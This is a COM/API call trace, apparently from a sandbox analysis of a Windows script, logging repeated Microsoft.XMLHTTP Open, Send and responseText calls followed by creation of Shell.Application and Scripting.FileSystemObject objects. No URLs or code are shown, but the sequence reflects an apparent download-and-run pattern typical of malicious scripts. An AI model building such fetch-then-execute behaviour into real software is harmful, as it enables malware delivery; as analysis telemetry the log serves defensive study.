	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0403.019] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.019] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.019] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0403.019] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.019] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.019] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.019] longjmp () 
	[0403.020] longjmp () 
	[0403.020] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.020] SysStringLen (param_1=0x0) returned 0x0
	[0403.020] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.020] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74a0) returned 0x0
	[0403.020] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7508) returned 0x0
	[0403.020] ??2@YAPEAX_K@Z () returned 0x62f330
	[0403.020] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7508, pUnkSite=0x62f330) 
	[0403.020] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.020] XMLHTTPRequest:IUnknown:Release (This=0x49c7508) returned 0x0
	[0403.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74a0) returned 0x0
	[0403.020] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74a0) returned 0x3
	[0403.020] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.020] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74a0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74a0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.021] longjmp () 
	[0403.021] longjmp () 
	[0403.021] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.021] SysStringLen (param_1=0x0) returned 0x0
	[0403.021] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.021] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0403.021] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c38) returned 0x0
	[0403.021] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.021] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c38, pUnkSite=0x62f310) 
	[0403.021] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.021] XMLHTTPRequest:IUnknown:Release (This=0x49c5c38) returned 0x0
	[0403.021] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0403.021] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0403.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.022] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.022] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0403.022] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.179] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0403.180] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0403.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0403.180] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0403.180] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0403.180] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0403.180] SysStringLen (param_1=0x0) returned 0x0
	[0403.180] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0403.180] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0403.180] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0403.180] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0403.181] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0403.181] ??2@YAPEAX_K@Z () returned 0x62f350
	[0403.181] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0403.181] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0403.181] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0403.181] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0403.181] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0403.181] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0403.181] SysStringLen (param_1=0x0) returned 0x0
	[0403.181] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0403.184] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0403.184] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0403.184] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0403.184] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0403.184] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0403.184] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0403.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0403.593] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0403.593] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0403.594] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.594] SysStringLen (param_1=0x0) returned 0x0
	[0403.594] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.595] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7550) returned 0x0
	[0403.595] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0403.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c88) returned 0x0
	[0403.595] ??2@YAPEAX_K@Z () returned 0x62f310
	[0403.595] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c88, pUnkSite=0x62f310) 
	[0403.595] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0403.595] XMLHTTPRequest:IUnknown:Release (This=0x49c5c88) returned 0x0
	[0403.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7550) returned 0x0
	[0403.595] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7550) returned 0x3
	[0403.595] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0403.595] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7550, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0403.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7550, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0403.597] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0403.597] SysStringLen (param_1=0x0) returned 0x0
	[0403.597] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0403.597] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0403.597] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5ba0) returned 0x0
	[0403.597] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
